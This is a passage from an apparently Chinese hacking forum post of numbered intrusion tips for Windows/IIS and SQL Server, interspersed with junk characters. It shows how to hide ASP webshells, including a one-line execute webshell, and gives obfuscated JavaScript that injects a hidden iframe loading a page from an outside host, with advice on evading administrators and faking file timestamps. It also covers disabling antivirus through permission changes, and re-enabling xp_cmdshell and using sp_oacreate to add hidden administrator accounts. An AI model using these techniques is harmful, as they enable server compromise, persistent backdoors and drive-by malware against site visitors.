用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
5 P' ?2 ^4 _( u) u
" T. n& |! p$ x8 ~1 c7 N: Z53、隐藏ASP后门的两种方法
+ Y# I- o# b7 B! k; Z2 e1、建立非标准目录:mkdir images..\
+ j8 A6 O; G& M7 d) j3 P9 L拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
1 V9 l q9 z' m Z4 Y: z通过web访问ASP木马:http://ip/images../news.asp?action=login; |# C$ {& ]# o7 z
如何删除非标准目录:rmdir images..\ /s0 T; k& J/ @% j7 F
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
1 p# n9 Z1 s. ymkdir programme.asp
5 P8 f7 H$ {/ y/ F7 {. X1 ?新建1.txt文件内容:<!--#include file=”12.jpg”-->
. J% ~! P# X) q新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
. q6 e7 m* Q" s3 Vattrib +H +S programme.asp1 Q$ w4 A, I7 g8 x7 `
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
. o0 }7 D) @0 q9 U* H0 A+ S/ H9 @' u j, I( h
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。; O& T! V5 K7 S2 ?# C
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。1 O# z. q9 E3 K8 i2 p0 W7 z7 o
3 N$ a i9 b: ?3 n) |55、JS隐蔽挂马
6 y% X J* E b0 d5 b0 y* Q' L1.! ^0 O/ K4 g) U" L3 t1 }
var tr4c3="<iframe src=ht";
1 X" a: Y; Q2 r vtr4c3 = tr4c3+"tp:/";
K, Z: y/ Z! i3 `tr4c3 = tr4c3+"/ww";9 Y7 h. E/ v6 y' ^. X# q
tr4c3 = tr4c3+"w.tr4";) |+ A! x6 L1 p, V
tr4c3 = tr4c3+"c3.com/inc/m";
8 p- R- _; @) _* A6 k/ z o8 K4 Qtr4c3 = tr4c3+"m.htm style="display:none"></i";# U7 {/ W) ^3 q' O6 P$ I- y
tr4c3 =tr4c3+"frame>'";
7 q6 Z, t \2 U+ \, B' wdocument.write(tr4c3);
- K' k4 | X( @/ s$ K5 ~避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。5 I! L; T9 d1 H5 f; S
; N8 Q& u6 ~, l1 X" G: n. [
2.
* L4 V3 M$ ?7 b/ m+ f5 \转换进制,然后用EVAL执行。如# r; y( G, ~6 K- @4 Q
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
' a; }9 E' W, `% x0 @& ?不过这个有点显眼。+ |% R1 `, L6 F% M( h @
3.
+ g$ `1 v! g5 H1 e' Ddocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
: T# c) q0 N& {+ `最后一点,别忘了把文件的时间也修改下。
4 O/ ]7 l) `! l5 v/ c; F4 A
( h/ d: y, L& g56.3389终端入侵常用DOS命令: r2 P1 ^$ O( ^( ^* S( z
taskkill taskkill /PID 1248 /t
; F) i) }+ g/ x4 Q8 x$ S; d1 v* h, E
tasklist 查进程
: a8 p; H( x5 O0 @# k, `+ G+ z) W4 j& n4 Q6 L
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
& E& {) o& K5 B) }4 \% B, s, G$ u. ^iisreset /reboot/ E/ j! ]. ]. x6 d5 c8 W
tsshutdn /reboot /delay:1 重起服务器) s- \6 L+ `7 u0 V: c6 }* S
7 [' `& J* A) a4 ^4 P7 H# Xlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
! R$ z9 |" R; H, F! v! z5 o3 Z# d9 h: L
query user 查看当前终端用户在线情况' P* M% d: G: a. I, t
: w4 b' H& @) i; G+ A要显示有关所有会话使用的进程的信息,请键入:query process *
: Z0 ~- ^5 ]9 A1 X) D
# ~5 S, g8 j4 v6 h ~+ T, s要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2# V5 Q2 U4 @; }9 S, J. U+ h/ p
9 L% ~$ b. e9 Z' _3 T: m; y
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2" U p; J W# ^9 N$ K7 H1 X# h
' n) ?7 [. L& k要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
. n ?6 \# a n( ^; `0 j! V0 Y- Z( {
: k D! A. Z, t/ |3 D命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启$ k9 `$ N" f9 u7 x. ^1 s
5 H) G3 u. v& n) l9 @ S
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
A2 p$ l% X1 a( q' l5 ^2 \4 I% x: o( @" b. X" f
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
; O6 G. K5 b" g7 l* ?1 e# ]7 {1 E/ G/ r
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机% Q; w |8 ?4 w8 s* V
" j7 y, G# j* E2 N56、在地址栏或按Ctrl+O,输入:4 ~* G' Y; D5 d+ O! K0 R
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;- U* o& T9 ?, c6 A6 `" G( r* T
6 _ Q1 s$ `% Z' q1 h8 Y& T) ~
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
% B' Z9 O; z2 x: r% U. J& s: U7 I' [1 ?/ Y" A
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,+ E$ C9 {6 S9 ^3 z* c# z# k. V7 j: B
用net localgroup administrators是可以看到管理组下,加了$的用户的。
5 ] k! ]8 K2 {% Q# o" |
+ z' P' p4 ~$ v- R$ d7 I58、 sa弱口令相关命令
0 e# Q% x" q8 u4 o6 r) u {
* y# B8 d; U) y- Q# a一.更改sa口令方法:) A6 G$ N( r# z6 h3 C9 a
用sql综合利用工具连接后,执行命令:0 ]! j% ~/ d9 u" [* W7 O
exec sp_password NULL,'20001001','sa'
4 \$ s8 G( F1 E" H& \/ I(提示:慎用!)
) }1 V1 y, O. {7 e/ k( O7 m5 U+ `) Q6 ?0 ^9 f: I7 k
二.简单修补sa弱口令.2 m- w! v5 p/ _5 y, I: J" i6 g
- T# |! Y$ b5 r/ O7 d: w, a方法1:查询分离器连接后执行:
' z- i2 y% S) p4 Q2 Cif exists (select * from/ M. u4 ~0 a+ n; ^4 Y X
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and4 ? L! U1 r) p% p' _7 d2 d
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
& p6 o0 W7 T4 v) `: s
$ }0 e8 N7 w' rexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
5 q1 O6 {, B# V# w# E/ P, l- j" d6 b6 H
GO3 j) H) K, L% A( I
: U6 K% r3 K) n3 ~$ _
然后按F5键命令执行完毕
1 g9 u% F% [1 g) C
. Z7 e0 D2 q: F2 `4 }方法2:查询分离器连接后' T8 S5 u* N7 }0 r5 g
第一步执行:use master
3 M4 j8 v8 @# F/ w第二步执行:sp_dropextendedproc 'xp_cmdshell'
1 B7 I, D+ o% @" R' S: t* K% e然后按F5键命令执行完毕, `. T Z1 w8 A& J+ C* l
, a9 U' T( L W/ ~% M5 W% [
- L& j! K$ S9 B* g- `
三.常见情况恢复执行xp_cmdshell.6 h1 R# t+ u, o9 z8 E
( U7 a! L* _7 T2 D
( |* a+ N" J, x; \1 未能找到存储过程'master..xpcmdshell'.! \) e+ N; B x4 i& |
恢复方法:查询分离器连接后,$ D! I+ a6 h7 q7 l" J# d
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
- R9 J2 f1 w% ^第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'9 }& r+ X9 J+ ~" v: j% w( Q
然后按F5键命令执行完毕
) K* G9 }! Q* s) c: d7 U& n3 G& N M, \+ t# M$ ~/ u- c; s5 Y
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)$ \6 _/ r5 ?& q* R J/ H
恢复方法:查询分离器连接后,
, g! A7 X& r8 [3 R z第一步执行:sp_dropextendedproc "xp_cmdshell"2 L( \& d) V) H2 F/ x" v, k
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'- k; T8 w( V5 i1 ^) u$ [& m
然后按F5键命令执行完毕2 p8 x& [# f: g3 e5 J1 o1 `
* n! l: g8 T* n4 J7 c
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)8 x! r3 f9 }3 o* x$ W% X
恢复方法:查询分离器连接后,7 P' c) S9 y9 Y8 Y. H& A+ U
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'- s! w2 B; o) e7 \0 D
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' / d( a( c4 L/ G9 e9 v6 E2 H; Q
然后按F5键命令执行完毕% I' k/ w) ^$ R5 e1 k
, |: c, H# @# F B t
四.终极方法.
% n4 g9 Y2 G4 _+ T如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:0 F0 x- V- F3 g
查询分离器连接后,
( z i4 g+ _) d. W2000servser系统:0 d6 H! J% O( M8 c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
9 O* t3 w5 ?7 T/ N k; G$ F
4 v, b9 A7 Q! x* E+ j" Bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. t# f+ @' p( l( e/ n6 d! A6 g9 ~7 p, t2 r
xp或2003server系统:* ~( I) ~, G% v N! @5 s
) W! U. A5 f4 Bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
0 X5 V/ T7 d0 p; e7 x$ H
2 i: P6 p/ r5 x- r& u0 k; ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
8 T# U7 C6 n) ?% b! J) \) h |
发表于 2012-9-15 14:51:03
收藏
支持
反对